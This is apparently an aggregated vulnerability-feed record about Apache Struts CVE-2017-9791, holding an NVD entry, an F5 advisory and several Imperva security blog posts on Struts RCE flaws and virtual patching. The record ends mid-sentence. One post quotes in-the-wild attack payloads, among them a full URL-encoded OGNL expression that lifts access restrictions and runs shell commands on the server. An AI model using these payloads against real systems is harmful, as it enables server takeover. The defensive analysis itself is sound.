{"cve": [{"lastseen": "2018-07-09T03:17:01", "bulletinFamily": "NVD", "description": "The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.", "modified": "2018-07-07T21:29:01", "published": "2017-07-10T12:29:00", "id": "CVE-2017-9791", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9791", "title": "CVE-2017-9791", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2017-07-19T00:24:00", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.3.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-07-18T23:10:00", "published": "2017-07-18T23:10:00", "href": "https://support.f5.com/csp/article/K23289753", "id": "F5:K23289753", "title": "Apache Struts vulnerability CVE-2017-9791", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "impervablog": [{"lastseen": "2017-07-14T02:18:38", "bulletinFamily": "blog", "description": "On July 7th, a new security vulnerability was published in Apache Struts 2 CVE-2017-9791 (S2-048[1]). Struts 2.3.x users with Struts 1 plugin, which includes the Showcase app, are vulnerable.\n\nOnce again, this vulnerability enables a Remote Code Execution (RCE), which is the most commonly exploited Apache Struts vulnerability. In this case, as in many other cases of RCE in Apache Struts, the attacks observed in the wild are also carried in the form of Object-Graph Navigation Language (OGNL) expressions.[2]\n\nLike the recent Struts 2 RCE [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), Imperva customers are protected against current variations of the attack using the zero-day attack detection mechanism in either SecureSphere or Incapsula. The zero-day attack detection mechanism protects against malicious traffic regardless of a specific web exploit.\n\n## The Vulnerability\n\nBased on [Apache release notes](<https://cwiki.apache.org/confluence/display/WW/S2-048>), \u201cit is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user\u201d. The message presented to the user is processed by the \u201cActionMessage\u201d routine and returned back to the user by the \u201cmessage\u201d function as follows:\n \n \n messages.add(\"msg\", new ActionMessage(**the_message**));\n\nLacking proper validation before execution, the message (the_message) processed by the server may potentially cause a remote code execution. To fulfill its execution potential, a remote entry point is required for the message. Following the route of the vulnerable code leads to this location:\n \n \n /struts2-showcase/integration/saveGangster.action\n\nPoking around the webpage reveals several inputs controlled by the user, including name, age, and description (see Figure 1):\n\n\n\n_Figure 1: Vulnerable Apache Struts application_\n\nWhen submitting the \u201cGangster\u201d data the server processes the user\u2019s input with the vulnerable \u201cActionMessage\u201d routine and returns a message to the user (see Figure 2):\n\n\n\n\n\n_Figure 2: Request to the vulnerable page and result_\n\nAs can be observed, the processed message is integrated with the user\u2019s input data (\u201c_Gangster a added\u2026_\u201d) which means now the input data can be modified to include arbitrary code execution (see Figure 3). For instance, the RCE payload can add a custom header to the response message or use an OGNL mechanism to run malicious code (see the second payload in \u201cAttacks in the Wild\u201d section):\n\n\n\n_Figure 3: Exploitation of the vulnerable application_\n\n## Imperva Zero-Day Protection\n\nAs mentioned earlier, Imperva customers are protected against this new Apache Struts vulnerability using zero-day detection mechanisms from either SecureSphere or Incapsula, which detect incoming traffic with malicious content, regardless of a specific vulnerability or exploit.\n\nThe zero-day detection technique prevents the new attack using two complementary deterrence layers:\n\n * First, since the exploit includes an arbitrary remote code to be executed, customers are protected out-of-the-box to most attack variations using a generic Remote Command Execution mitigation mechanism (see Figure 4):\n\n\n\n_Figure 4: SecureSphere blocking a generic RCE_\n\n * Then, in the second layer of defense, SecureSphere and Incapsula both detect potential OGNL expressions which are used to manipulate Java objects, and are commonly used by attackers to inject remote code in vulnerable Apache Struts servers, including in this attack (see Figure 5):\n\n__\n\n_Figure 5: SecureSphere blocking a generic OGNL-based RCE_\n\nNevertheless, to be on the safe side, a few hours following the release of this critical vulnerability our security teams published a dedicated mitigation guideline and virtually patched Imperva customers.\n\n## Attacks in the Wild\n\nAn increasing amount of attack attempts have been seen since the publication of this new Struts vulnerability, mostly as hard copy replication of PoCs published shortly after the first announcement, and refer to reconnaissance attempts to track vulnerable servers. Below are details on two common payloads seen in the wild.\n\n### Payload #1: Custom Header Insertion Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050\u2032)}** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nHTTP headers are easily parsed and extracted with automated scripts, therefore validating the existence of a new custom HTTP header is very straight forward for the attackers to implement and can be used as a reconnaissance request before the actual attack \u2013 i.e., the actual RCE which will take over the server.\n\nIn most cases attackers will use this kind of reconnaissance as part of a vulnerability scanning tool on predefined IPs range, facilitating bots to effectively scan a wide range of addresses. Based on our classification analysis, IPs that were registered in this attack are known to generate mostly bot traffic (~96%).\n\n### Payload #2: OGNL Expression Execution Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **%7b%28%23szgx%3d%27multipart%2fform-data%27%29.%28%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3f%28%23_memberAccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d%29.%28%23ognlUtil%3d%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3d%27echo%20891549112%27%29.%28%23iswin%3d%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3d%28%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d%29%29.%28%23p%3dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3d%23p.start%28%29%29.%28%23ros%3d%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2c%23ros%29%29.%28%23ros.close%28%29%29%7d** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nDecoding the URL\u2019s payload injected to the name parameter unveils the following RCE (see Figure 6):\n\n\n\n_Figure 6: OGNL-based RCE (URL Decoded)_\n\nThe payload in this case refers to an attempt to execute OGNL expression, as an entry point to the attack. Again, in this case it is only a reconnaissance attempt before the attack, in which the attacker echoed a random generated number \u201c89159112\u201d to match when processing the response message.\n\nIt will be interesting to monitor the trending exploits over time and to see if and how the reconnaissance trend gradually shifts to actual exploitation attempts of these servers.\n\n## Stay Protected\n\nBased on the official [advisory](<http://seclists.org/oss-sec/2017/q3/92>) this vulnerability does not affect applications using Struts 2.5.x series or applications that do not use the Struts 1 plugin. Meaning that an update is required for those who use the earlier vulnerable patches. It is also mentioned that even if the Struts 1 plugin is available while excluding certain code parts, the application is safe.\n\nAn alternative to the formal advisory, which could be costly and time consuming, is [virtual patching](<https://www.owasp.org/index.php/Virtual_Patching_Best_Practices>). Instead of leaving a web application exposed to attack while attempting to modify code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nIn addition to virtual patching, zero-day detection mechanisms such as those mentioned above protect sites by detecting and blocking new strains of attack prior to its release without any modification to systems.\n\nLearn more about protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).\n\n[1] <https://cwiki.apache.org/confluence/display/WW/S2-048>\n\n[2] <https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>", "modified": "2017-07-13T19:12:31", "published": "2017-07-13T19:12:31", "href": "https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/", "id": "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "title": "CVE-2017-9791: Analysis of RCE in the Struts Showcase App in Struts 1 Plugin", "type": "impervablog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:50", "bulletinFamily": "blog", "description": "Just two months ago we [published an analysis](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) of a critical remote code execution (RCE) security vulnerability in Apache Struts. Now Apache Struts has published a new version fixing yet another critical RCE vulnerability (September 5, 2017).\n\n[CVE-2017-9805](<http://struts.apache.org/docs/s2-052.html>) is a vulnerability in Apache Struts related to using the Struts REST plugin with XStream handler to handle XML payloads. If exploited it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it.\n\n## Imperva Customers Protected\n\nIn addition to our zero-day protection rules that spotted this attack, we\u2019ve also published new dedicated security rules to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability. As of the publication date of this post, our systems have successfully blocked thousands of attacks from all over the world (see \"In the Wild\" section below).\n\n## Multiple Apache Struts Vulnerabilities in 2017\n\nAs mentioned above, this isn\u2019t the first time such a critical vulnerability has been found in Apache Struts. In fact, we\u2019ve seen an increasing amount of them in the Struts platform as several other RCE vulnerabilities have already been discovered since the beginning of 2017. The CVEs are summarized below.\n\n**Date** | **CVSS** | **Vulnerability** | **CVE** \n---|---|---|--- \n9/7/2017 | 9.3 | Apache Struts views/freemarker/FreemarkerManager.java Freemarker Tag Handling Remote Code Execution | 2017-12611 \n9/5/2017 | 10 | Apache Struts REST Plugin XStream XML Request Deserialization Remote Code Execution | 2017-9805 \n7/11/2017 | 5 | Apache Struts URL Validator Regular Expression URL Handling Remote DoS | 2017-7672, 2017-9804 \n7/11/2017 | 6.8 | Apache Struts Spring AOP Functionality Unspecified Remote DoS | 2017-9787 \n7/7/2017 | 10 | Apache Struts 1 Plugin for Struts 2 ActionMessage Class Error Message Input Handling Remote Code Execution | 2017-9791 \n3/6/2017 | 10 | Apache Struts Jakarta Multipart Parser File Upload Multiple Content Value Handling Remote Code Execution (Struts-Shock) | 2017-5638 \n \n## About the CVE-2017-9805 Vulnerability\n\nApache Struts contains a flaw in the REST Plugin XStream that is triggered as the program insecurely deserializes user-supplied input in XML requests. More specifically, the problem occurs in XStreamHandler\u2019s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object, resulting in arbitrary code execution vulnerabilities. More information about the vulnerability can be found [here](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>).\n\n## In the Wild\n\nTo date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png>)\n\n_Figure 1: Geo-distribution of CVE-2017-9805 attacks_\n\nIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. According to [Shodan](<https://www.shodan.io/>), this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). [Unlike past vulnerabilities](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>), most of the attempted attacks (~80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). Exploitation attempts involved running operating systems such as shell, wget, or cURL in order to download malicious payload and take over the server to mount further attacks, usually [DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>), as part of a larger botnet.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg>)\n\n_Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts_\n\n## Stay Protected with Virtual Patching\n\nBased on the official [advisory](<http://struts.apache.org/docs/s2-052.html>), this vulnerability affects applications using Struts 2.5 (Struts 2.5.12). There is no known workaround, meaning that an update is required for those who use these versions. It is also mentioned that backward compatibility is not ensured and that some REST actions stop working.\n\nAn immediate security measure organizations can use to protect against these types of vulnerabilities is virtual patching. Instead of leaving a web application exposed to attack while attempting to modify the code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nLearn more about virtual patching and protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).", "modified": "2017-09-08T16:10:08", "published": "2017-09-08T16:10:08", "id": "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "href": "https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/", "title": "CVE-2017-9805: Analysis of Apache Struts RCE Vulnerability in REST Plugin", "type": "impervablog", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-25T19:52:24", "bulletinFamily": "blog", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "modified": "2017-12-18T17:43:16", "published": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "bulletinFamily": "blog", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. Given that web apps frequently access back-end data stores, the potential for a RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is a not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe, accomplishing the same thing for any Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, its more cost effective for them to just broadly launch an attack than it is first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it a \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can 